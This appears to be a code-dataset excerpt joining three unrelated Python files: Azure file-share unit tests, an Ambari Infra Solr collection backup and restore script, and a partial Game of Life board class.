self.assertEqual(props.quota, 1)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
exists = share.get_share_properties()
# Assert
self.assertTrue(exists)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_not_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
with self.assertRaises(ResourceNotFoundError):
share.get_share_properties()
# Assert
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_snapshot_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
snapshot = share.create_snapshot()
# Act
snapshot_client = self.fsc.get_share_client(share.share_name, snapshot=snapshot)
exists = snapshot_client.get_share_properties()
# Assert
self.assertTrue(exists)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_share_snapshot_not_exists(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
made_up_snapshot = '2017-07-19T06:53:46.0000000Z'
# Act
snapshot_client = self.fsc.get_share_client(share.share_name, snapshot=made_up_snapshot)
with self.assertRaises(ResourceNotFoundError):
snapshot_client.get_share_properties()
# Assert
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_unicode_create_share_unicode_name(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = u'啊齄丂狛狜'
# Act
with self.assertRaises(HttpResponseError):
# not supported - share name must be alphanumeric, lowercase
client = self.fsc.get_share_client(share_name)
client.create_share()
# Assert
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_no_options(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
shares = list(self.fsc.list_shares())
# Assert
self.assertIsNotNone(shares)
self.assertGreaterEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertNamedItemInContainer(shares, share.share_name)
self._delete_shares()
@GlobalResourceGroupPreparer()
@StorageAccountPreparer(random_name_enabled=True, sku='premium_LRS', name_prefix='pyacrstorage', kind='FileStorage')
def test_list_shares_no_options_for_premium_account(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
shares = list(self.fsc.list_shares())
# Assert
self.assertIsNotNone(shares)
self.assertGreaterEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertIsNotNone(shares[0].provisioned_iops)
self.assertIsNotNone(shares[0].provisioned_ingress_mbps)
self.assertIsNotNone(shares[0].provisioned_egress_mbps)
self.assertIsNotNone(shares[0].next_allowed_quota_downgrade_time)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
#share = self._get_share_reference()
share = self._create_share('random')
snapshot1 = share.create_snapshot()
snapshot2 = share.create_snapshot()
# Act
shares = self.fsc.list_shares(include_snapshots=True)
# Assert
self.assertIsNotNone(shares)
all_shares = list(shares)
self.assertEqual(len(all_shares), 3)
self.assertNamedItemInContainer(all_shares, share.share_name)
self.assertNamedItemInContainer(all_shares, snapshot1['snapshot'])
self.assertNamedItemInContainer(all_shares, snapshot2['snapshot'])
share.delete_share(delete_snapshots=True)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_prefix(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
shares = list(self.fsc.list_shares(name_starts_with=share.share_name))
# Assert
self.assertEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertEqual(shares[0].name, share.share_name)
self.assertIsNone(shares[0].metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_include_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
share = self._get_share_reference()
share.create_share(metadata=metadata)
# Act
shares = list(self.fsc.list_shares(share.share_name, include_metadata=True))
# Assert
self.assertIsNotNone(shares)
self.assertGreaterEqual(len(shares), 1)
self.assertIsNotNone(shares[0])
self.assertNamedItemInContainer(shares, share.share_name)
self.assertDictEqual(shares[0].metadata, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_shares_with_num_results_and_marker(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
prefix = 'listshare'
share_names = []
for i in range(0, 4):
share_names.append(self._create_share(prefix + str(i)).share_name)
#share_names.sort()
# Act
generator1 = self.fsc.list_shares(prefix, results_per_page=2).by_page()
shares1 = list(next(generator1))
generator2 = self.fsc.list_shares(
prefix, results_per_page=2).by_page(continuation_token=generator1.continuation_token)
shares2 = list(next(generator2))
# Assert
self.assertIsNotNone(shares1)
self.assertEqual(len(shares1), 2)
self.assertNamedItemInContainer(shares1, share_names[0])
self.assertNamedItemInContainer(shares1, share_names[1])
self.assertIsNotNone(shares2)
self.assertEqual(len(shares2), 2)
self.assertNamedItemInContainer(shares2, share_names[2])
self.assertNamedItemInContainer(shares2, share_names[3])
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
metadata = {'hello': 'world', 'number': '42'}
# Act
share.set_share_metadata(metadata)
# Assert
md = share.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_get_share_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
# Act
client = self._get_share_reference()
created = client.create_share(metadata=metadata)
# Assert
self.assertTrue(created)
md = client.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_get_share_metadata_with_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
# Act
client = self._get_share_reference()
created = client.create_share(metadata=metadata)
snapshot = client.create_snapshot()
snapshot_client = self.fsc.get_share_client(client.share_name, snapshot=snapshot)
# Assert
self.assertTrue(created)
md = snapshot_client.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_properties(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
share.set_share_quota(1)
# Act
props = share.get_share_properties()
# Assert
self.assertIsNotNone(props)
self.assertEqual(props.quota, 1)
self._delete_shares()
@GlobalResourceGroupPreparer()
@StorageAccountPreparer(random_name_enabled=True, sku='premium_LRS', name_prefix='pyacrstorage', kind='FileStorage')
def test_get_share_properties_for_premium_account(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
# Act
props = share.get_share_properties()
# Assert
self.assertIsNotNone(props)
self.assertIsNotNone(props.quota)
self.assertIsNotNone(props.provisioned_iops)
self.assertIsNotNone(props.provisioned_ingress_mbps)
self.assertIsNotNone(props.provisioned_egress_mbps)
self.assertIsNotNone(props.next_allowed_quota_downgrade_time)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_existing_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
deleted = share.delete_share()
# Assert
self.assertIsNone(deleted)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_existing_share_fail_not_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
client = self._get_share_reference()
# Act
with LogCaptured(self) as log_captured:
with self.assertRaises(HttpResponseError):
client.delete_share()
log_as_str = log_captured.getvalue()
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_non_existing_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
client = self._get_share_reference()
# Act
with LogCaptured(self) as log_captured:
with self.assertRaises(HttpResponseError):
deleted = client.delete_share()
log_as_str = log_captured.getvalue()
self.assertTrue('ERROR' not in log_as_str)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_share_with_non_existing_share_fail_not_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
client = self._get_share_reference()
# Act
with LogCaptured(self) as log_captured:
with self.assertRaises(HttpResponseError):
client.delete_share()
log_as_str = log_captured.getvalue()
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_get_share_stats(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
share_usage = share.get_share_stats()
# Assert
self.assertEqual(share_usage, 0)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
resp = share.set_share_access_policy(signed_identifiers=dict())
# Assert
acl = share.get_share_access_policy()
self.assertIsNotNone(acl)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl_with_empty_signed_identifiers(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
resp = share.set_share_access_policy(dict())
# Assert
acl = share.get_share_access_policy()
self.assertIsNotNone(acl)
self.assertEqual(len(acl.get('signed_identifiers')), 0)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl_with_signed_identifiers(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
identifiers = dict()
identifiers['testid'] = AccessPolicy(
permission=ShareSasPermissions(write=True),
expiry=datetime.utcnow() + timedelta(hours=1),
start=datetime.utcnow() - timedelta(minutes=1),
)
resp = share.set_share_access_policy(identifiers)
# Assert
acl = share.get_share_access_policy()
self.assertIsNotNone(acl)
self.assertEqual(len(acl['signed_identifiers']), 1)
self.assertEqual(acl['signed_identifiers'][0].id, 'testid')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_set_share_acl_too_many_ids(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
# Act
identifiers = dict()
for i in range(0, 6):
identifiers['id{}'.format(i)] = AccessPolicy()
# Assert
with self.assertRaises(ValueError) as e:
share.set_share_access_policy(identifiers)
self.assertEqual(
str(e.exception),
'Too many access policies provided. The server does not support setting more than 5 access policies on a single resource.'
)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
dir0 = share.get_directory_client()
dir0.upload_file('file1', 'data1')
dir1 = share.get_directory_client('dir1')
dir1.create_directory()
dir1.upload_file('file2', 'data2')
dir2 = share.get_directory_client('dir2')
dir2.create_directory()
# Act
resp = list(share.list_directories_and_files())
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 3)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'dir1')
self.assertNamedItemInContainer(resp, 'dir2')
self.assertNamedItemInContainer(resp, 'file1')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = self._create_share()
dir1 = share_name.get_directory_client('dir1')
dir1.create_directory()
dir2 = share_name.get_directory_client('dir2')
dir2.create_directory()
snapshot1 = share_name.create_snapshot()
dir3 = share_name.get_directory_client('dir3')
dir3.create_directory()
file1 = share_name.get_file_client('file1')
file1.upload_file('data')
# Act
snapshot_client = self.fsc.get_share_client(share_name.share_name, snapshot=snapshot1)
resp = list(snapshot_client.list_directories_and_files())
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 2)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'dir1')
self.assertNamedItemInContainer(resp, 'dir2')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_num_results(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = self._create_share()
dir1 = share_name.create_directory('dir1')
root = share_name.get_directory_client()
root.upload_file('filea1', '1024')
root.upload_file('filea2', '1024')
root.upload_file('filea3', '1024')
root.upload_file('fileb1', '1024')
# Act
result = share_name.list_directories_and_files(results_per_page=2).by_page()
result = list(next(result))
# Assert
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
self.assertNamedItemInContainer(result, 'dir1')
self.assertNamedItemInContainer(result, 'filea1')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_num_results_and_marker(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share_name = self._create_share()
dir1 = share_name.get_directory_client('dir1')
dir1.create_directory()
dir1.upload_file('filea1', '1024')
dir1.upload_file('filea2', '1024')
dir1.upload_file('filea3', '1024')
dir1.upload_file('fileb1', '1024')
# Act
generator1 = share_name.list_directories_and_files(
'dir1', results_per_page=2).by_page()
result1 = list(next(generator1))
generator2 = share_name.list_directories_and_files(
'dir1', results_per_page=2).by_page(continuation_token=generator1.continuation_token)
result2 = list(next(generator2))
# Assert
self.assertEqual(len(result1), 2)
self.assertEqual(len(result2), 2)
self.assertNamedItemInContainer(result1, 'filea1')
self.assertNamedItemInContainer(result1, 'filea2')
self.assertNamedItemInContainer(result2, 'filea3')
self.assertNamedItemInContainer(result2, 'fileb1')
self.assertEqual(generator2.continuation_token, None)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_list_directories_and_files_with_prefix(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
dir1 = share.create_directory('dir1')
share.create_directory('dir1/pref_dir3')
share.create_directory('dir2')
root = share.get_directory_client()
root.upload_file('file1', '1024')
dir1.upload_file('pref_file2', '1025')
dir1.upload_file('file3', '1025')
# Act
resp = list(share.list_directories_and_files('dir1', name_starts_with='pref'))
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 2)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'pref_file2')
self.assertNamedItemInContainer(resp, 'pref_dir3')
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_shared_access_share(self, resource_group, location, storage_account, storage_account_key):
# SAS URL is calculated from storage key, so this test runs live only
if not self.is_live:
return
self._setup(storage_account, storage_account_key)
file_name = 'file1'
dir_name = 'dir1'
data = b'hello world'
share = self._create_share()
dir1 = share.create_directory(dir_name)
dir1.upload_file(file_name, data)
token = generate_share_sas(
share.account_name,
share.share_name,
share.credential.account_key,
expiry=datetime.utcnow() + timedelta(hours=1),
permission=ShareSasPermissions(read=True),
)
sas_client = ShareFileClient(
self.account_url(storage_account, "file"),
share_name=share.share_name,
file_path=dir_name + '/' + file_name,
credential=token,
)
# Act
print(sas_client.url)
response = requests.get(sas_client.url)
# Assert
self.assertTrue(response.ok)
self.assertEqual(data, response.content)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_permission_for_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
user_given_permission = "O:S-1-5-21-2127521184-1604012920-1887927527-21560751G:S-1-5-21-2127521184-" \
"1604012920-1887927527-513D:AI(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;" \
"S-1-5-21-397955417-626881126-188441444-3053964)"
share_client = self._create_share()
permission_key = share_client.create_permission_for_share(user_given_permission)
self.assertIsNotNone(permission_key)
server_returned_permission = share_client.get_permission_for_share(permission_key)
self.assertIsNotNone(server_returned_permission)
permission_key2 = share_client.create_permission_for_share(server_returned_permission)
# the permission key obtained from user_given_permission should be the same as the permission key obtained from
# server returned permission
self.assertEqual(permission_key, permission_key2)
@GlobalStorageAccountPreparer()
def test_transport_closed_only_once(self, resource_group, location, storage_account, storage_account_key):
if not self.is_live:
return
self._setup(storage_account, storage_account_key)
transport = RequestsTransport()
url = self.account_url(storage_account, "file")
credential = storage_account_key
prefix = TEST_SHARE_PREFIX
share_name = self.get_resource_name(prefix)
with ShareServiceClient(url, credential=credential, transport=transport) as fsc:
fsc.get_service_properties()
assert transport.session is not None
with fsc.get_share_client(share_name) as fc:
assert transport.session is not None
fsc.get_service_properties()
assert transport.session is not None
@GlobalStorageAccountPreparer()
def test_delete_directory_from_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._create_share()
dir1 = share.create_directory('dir1')
share.create_directory('dir2')
share.create_directory('dir3')
# Act
resp = list(share.list_directories_and_files())
self.assertEqual(len(resp), 3)
share.delete_directory('dir3')
# Assert
resp = list(share.list_directories_and_files())
self.assertEqual(len(resp), 2)
self._delete_shares()
# ------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| 38.45283 | 138 | 0.679281 |
7abb3e22f902576952adf7712a0f6b66a2b5a84c
| 15,089 |
py
|
Python
|
stacks/XIAOMATECH/1.0/services/AMBARI_INFRA_SOLR/package/scripts/collection.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 3 |
2019-08-13T01:44:16.000Z
|
2019-12-10T04:05:56.000Z
|
stacks/XIAOMATECH/1.0/services/AMBARI_INFRA_SOLR/package/scripts/collection.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | null | null | null |
stacks/XIAOMATECH/1.0/services/AMBARI_INFRA_SOLR/package/scripts/collection.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 7 |
2019-05-29T17:35:25.000Z
|
2021-12-04T07:55:10.000Z
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import time
from resource_management.core.logger import Logger
from resource_management.core.resources.system import Directory, Execute, File
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions import solr_cloud_util
from resource_management.libraries.resources.properties_file import PropertiesFile
def backup_collection(env):
"""
Backup collections using replication API (as Solr Cloud Backup API is not available in Solr 5)
If the cluster is not kerberized, it will be needed to resolve ip addresses to hostnames (as SOLR_HOST=`hostname -f` is not used by default in infra-solr-env)
"""
import params, command_commons
env.set_params(command_commons)
Directory(
command_commons.index_location,
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group)
Logger.info(
format("Backup Solr Collection {collection} to {index_location}"))
host_core_map = command_commons.solr_backup_host_cores_map
host_or_ip = params.hostname
# IP resolve - for unsecure cluster
host_ip_pairs = {}
if not params.security_enabled:
keys = host_core_map.keys()
for key in keys:
if command_commons.is_ip(key):
resolved_hostname = command_commons.resolve_ip_to_hostname(key)
host_ip_pairs[resolved_hostname] = key
if params.hostname in host_ip_pairs:
host_or_ip = host_ip_pairs[params.hostname]
cores = host_core_map[host_or_ip] if host_or_ip in host_core_map else []
for core in cores:
if core in command_commons.skip_cores:
Logger.info(format("Core '{core}' is filtered out."))
continue
solr_request_path = format(
"{core}/replication?command=BACKUP&location={index_location}&name={core}&wt=json"
)
backup_api_cmd = command_commons.create_solr_api_request_command(
solr_request_path)
Execute(backup_api_cmd, user=params.infra_solr_user, logoutput=True)
if command_commons.request_async is False:
Logger.info(
"Sleep 5 seconds to wait until the backup request is executed."
)
time.sleep(5)
Logger.info("Check backup status ...")
solr_status_request_path = format(
"{core}/replication?command=details&wt=json")
status_check_json_output = format(
"{index_location}/backup_status.json")
status_check_cmd = command_commons.create_solr_api_request_command(
solr_status_request_path, status_check_json_output)
command_commons.snapshot_status_check(
status_check_cmd,
status_check_json_output,
core,
True,
log_output=command_commons.log_output,
tries=command_commons.request_tries,
time_interval=command_commons.request_time_interval)
snapshot_folder = format("{index_location}/snapshot.{core}")
if command_commons.check_folder_exists(snapshot_folder):
command_commons.check_folder_until_size_not_changes(
snapshot_folder)
def restore_collection(env):
"""
Restore collections - by copying snapshots with backup_* prefix, then remove old one and remove backup_* prefixes from the folder names.
"""
import params, command_commons
env.set_params(command_commons)
if command_commons.solr_num_shards == 0:
raise Exception(
format("The 'solr_shards' command parameter is required to set."))
if not command_commons.solr_restore_config_set:
raise Exception(
format(
"The 'solr_restore_config_set' command parameter is required to set."
))
Logger.info("Original core / host map: " +
str(command_commons.solr_backup_core_host_map))
Logger.info("New core / host map: " +
str(command_commons.solr_restore_core_host_map))
original_core_host_pairs = command_commons.sort_core_host_pairs(
command_commons.solr_backup_core_host_map)
new_core_host_pairs = command_commons.sort_core_host_pairs(
command_commons.solr_restore_core_host_map)
core_pairs = command_commons.create_core_pairs(original_core_host_pairs,
new_core_host_pairs)
Logger.info("Generated core pairs: " + str(core_pairs))
Logger.info(
format("Remove write.lock files from folder '{index_location}'"))
for write_lock_file in command_commons.get_files_by_pattern(
format("{index_location}"), 'write.lock'):
File(write_lock_file, action="delete")
Logger.info(
format(
"Restore Solr Collection {collection} from {index_location} ..."))
if command_commons.collection in [
"ranger_audits", "history", "hadoop_logs", "audit_logs",
"vertex_index", "edge_index", "fulltext_index"
]: # Make sure ambari wont delete an important collection
raise Exception(
format(
"Selected collection for restore is: {collection}. It is not recommended to restore on default collections."
))
hdfs_cores_on_host = []
for core_pair in core_pairs:
src_core = core_pair['src_core']
target_core = core_pair['target_core']
if src_core in command_commons.skip_cores:
Logger.info(format("Core '{src_core}' (src) is filtered out."))
continue
elif target_core in command_commons.skip_cores:
Logger.info(
format("Core '{target_core}' (target) is filtered out."))
continue
core_data = command_commons.solr_restore_core_data
only_if_cmd = format("test -d {index_location}/snapshot.{src_core}")
core_root_dir = format("{solr_datadir}/backup_{target_core}")
core_root_without_backup_dir = format("{solr_datadir}/{target_core}")
if command_commons.solr_hdfs_path:
Directory([core_root_dir],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group,
only_if=only_if_cmd)
else:
Directory([
format("{core_root_dir}/data/index"),
format("{core_root_dir}/data/tlog"),
format("{core_root_dir}/data/snapshot_metadata")
],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group,
only_if=only_if_cmd)
core_details = core_data[target_core]['properties']
core_properties = {}
core_properties['numShards'] = core_details['numShards']
core_properties[
'collection.configName'] = command_commons.solr_restore_config_set
core_properties['name'] = target_core
core_properties['replicaType'] = core_details['replicaType']
core_properties['collection'] = command_commons.collection
if command_commons.solr_hdfs_path:
core_properties[
'coreNodeName'] = 'backup_' + core_details['coreNodeName']
else:
core_properties['coreNodeName'] = core_details['coreNodeName']
core_properties['shard'] = core_details['shard']
if command_commons.solr_hdfs_path:
hdfs_solr_node_folder = command_commons.solr_hdfs_path + format(
"/backup_{collection}/") + core_details['coreNodeName']
source_folder = format("{index_location}/snapshot.{src_core}/")
if command_commons.check_folder_exists(source_folder):
hdfs_cores_on_host.append(target_core)
command_commons.HdfsResource(
format("{hdfs_solr_node_folder}/data/index/"),
type="directory",
action="create_on_execute",
source=source_folder,
owner=params.infra_solr_user,
mode=0755,
recursive_chown=True,
recursive_chmod=True)
command_commons.HdfsResource(
format("{hdfs_solr_node_folder}/data/tlog"),
type="directory",
action="create_on_execute",
owner=params.infra_solr_user,
mode=0755)
command_commons.HdfsResource(
format("{hdfs_solr_node_folder}/data/snapshot_metadata"),
type="directory",
action="create_on_execute",
owner=params.infra_solr_user,
mode=0755)
else:
copy_cmd = format(
"cp -r {index_location}/snapshot.{src_core}/* {core_root_dir}/data/index/") if command_commons.solr_keep_backup \
else format("mv {index_location}/snapshot.{src_core}/* {core_root_dir}/data/index/")
Execute(
copy_cmd,
only_if=only_if_cmd,
user=params.infra_solr_user,
logoutput=True)
PropertiesFile(
core_root_dir + '/core.properties',
properties=core_properties,
owner=params.infra_solr_user,
group=params.user_group,
mode=0644,
only_if=only_if_cmd)
Execute(
format("rm -rf {solr_datadir}/{collection}*"),
user=params.infra_solr_user,
logoutput=True)
for core_pair in core_pairs:
src_core = core_pair['src_core']
src_host = core_pair['src_host']
target_core = core_pair['target_core']
if src_core in command_commons.skip_cores:
Logger.info(format("Core '{src_core}' (src) is filtered out."))
continue
elif target_core in command_commons.skip_cores:
Logger.info(
format("Core '{target_core}' (target) is filtered out."))
continue
if os.path.exists(format("{index_location}/snapshot.{src_core}")):
data_to_save = {}
host_core_data = command_commons.solr_restore_core_data
core_details = host_core_data[target_core]['properties']
core_node = core_details['coreNodeName']
data_to_save['core'] = target_core
data_to_save['core_node'] = core_node
data_to_save['old_host'] = core_pair['target_host']
data_to_save['new_host'] = src_host
if command_commons.solr_hdfs_path:
data_to_save['new_core_node'] = "backup_" + core_node
else:
data_to_save['new_core_node'] = core_node
command_commons.write_core_file(target_core, data_to_save)
jaas_file = params.infra_solr_jaas_file if params.security_enabled else None
core_json_location = format("{index_location}/{target_core}.json")
znode_json_location = format(
"/restore_metadata/{collection}/{target_core}.json")
solr_cloud_util.copy_solr_znode_from_local(
params.zookeeper_quorum, params.infra_solr_znode,
params.java64_home, jaas_file, core_json_location,
znode_json_location)
core_root_dir = format("{solr_datadir}/backup_{target_core}")
core_root_without_backup_dir = format("{solr_datadir}/{target_core}")
if command_commons.solr_hdfs_path:
if target_core in hdfs_cores_on_host:
Logger.info(
format(
"Core data '{target_core}' is located on this host, processing..."
))
host_core_data = command_commons.solr_restore_core_data
core_details = host_core_data[target_core]['properties']
core_node = core_details['coreNodeName']
collection_core_dir = command_commons.solr_hdfs_path + format(
"/{collection}/{core_node}")
backup_collection_core_dir = command_commons.solr_hdfs_path + format(
"/backup_{collection}/{core_node}")
command_commons.HdfsResource(
collection_core_dir,
type="directory",
action="delete_on_execute",
owner=params.infra_solr_user)
if command_commons.check_hdfs_folder_exists(
backup_collection_core_dir):
collection_backup_core_dir = command_commons.solr_hdfs_path + format(
"/{collection}/backup_{core_node}")
command_commons.move_hdfs_folder(
backup_collection_core_dir, collection_backup_core_dir)
else:
Logger.info(
format(
"Core data '{target_core}' is not located on this host, skipping..."
))
Execute(
format("mv {core_root_dir} {core_root_without_backup_dir}"),
user=params.infra_solr_user,
logoutput=True,
only_if=format("test -d {core_root_dir}"))
Directory([format("{core_root_without_backup_dir}")],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group,
recursive_ownership=True,
only_if=format("test -d {core_root_without_backup_dir}"))
if command_commons.solr_hdfs_path and not command_commons.solr_keep_backup:
only_if_cmd = format(
"test -d {index_location}/snapshot.{src_core}")
Directory(
format("{index_location}/snapshot.{src_core}"),
action="delete",
only_if=only_if_cmd,
owner=params.infra_solr_user)
| 43.111429 | 162 | 0.619325 |
4a4e29b33d782e1cd998ef1451869c55ac9fcbce
| 4,539 |
py
|
Python
|
Game_of_Life/board.py
|
Moomoo-pls/NLP_Game_of_Life
|
afe6bb6ccd4a83b6ffeccc8ac257872251bd39bb
|
[
"MIT"
] | null | null | null |
Game_of_Life/board.py
|
Moomoo-pls/NLP_Game_of_Life
|
afe6bb6ccd4a83b6ffeccc8ac257872251bd39bb
|
[
"MIT"
] | null | null | null |
Game_of_Life/board.py
|
Moomoo-pls/NLP_Game_of_Life
|
afe6bb6ccd4a83b6ffeccc8ac257872251bd39bb
|
[
"MIT"
] | null | null | null |
from Game_of_Life.cell import Cell
from random import randint
class Board:
def __init__(self, rows, columns):
# The rows and columns will be initialized by the size of the console
self.rows = rows
self.columns = columns
self.allDead = False
# initialize a cell object in every row
self.grid = [[Cell() for column_cells in range(self.columns)] for row_cells in range(self.rows)]
self.generate_board()
def isAllDead(self):
'''
Check to see if all the cells died
Only returns true if they all died.
'''
for row in self.grid:
for column in row:
if column.is_alive() == True:
return False
return True
def generate_board(self):
'''
Goes through each row and randomly sets a cell alive
'''
for row in self.grid:
for column in row:
#there is a 20% chance the cells spawn alive.
chance_number = randint(0,4)
if chance_number == 1:
column.set_alive()
def draw_board(self):
'''
Draw the current state of the board in the terminal
'''
for row in self.grid:
for column in row:
print (column.print_status_character(),end='')
print () # to create a new line pr. row.
def update_board(self):
'''
Updates the state of the board based on
the check of each cell. The cells react according
to the state they were in on the board, not dynamically.
Ex. If a cell flips, it's neighbours still process it in
it's unflipped state.
'''
#cells list for living cells to kill and cells to resurrect or keep alive
goes_alive = []
gets_killed = []
for row in range(len(self.grid)):
for column in range(len(self.grid[row])):
# Check neighbour square:
check_neighbour = self.find_neighbour(row , column)
living_neighbours_count = []
for neighbour_cell in check_neighbour:
# Check live status for neighbour_cell:
if neighbour_cell.is_alive():
living_neighbours_count.append(neighbour_cell)
cell_object = self.grid[row][column]
status_main_cell = cell_object.is_alive()
#If the cell is alive, check the neighbour status.
if status_main_cell == True:
if len(living_neighbours_count) < 2 or len(living_neighbours_count) > 3:
gets_killed.append(cell_object)
if len(living_neighbours_count) == 3 or len(living_neighbours_count) == 2:
goes_alive.append(cell_object)
else:
if len(living_neighbours_count) == 3:
goes_alive.append(cell_object)
# Set cell statuses
for cell_items in goes_alive:
cell_items.set_alive()
for cell_items in gets_killed:
cell_items.set_dead()
def find_neighbour(self,check_row,check_column):
'''
method that checks all the neighbours for all the cells
and returns the list of the valid neighbours so the update
method can set the new status
'''
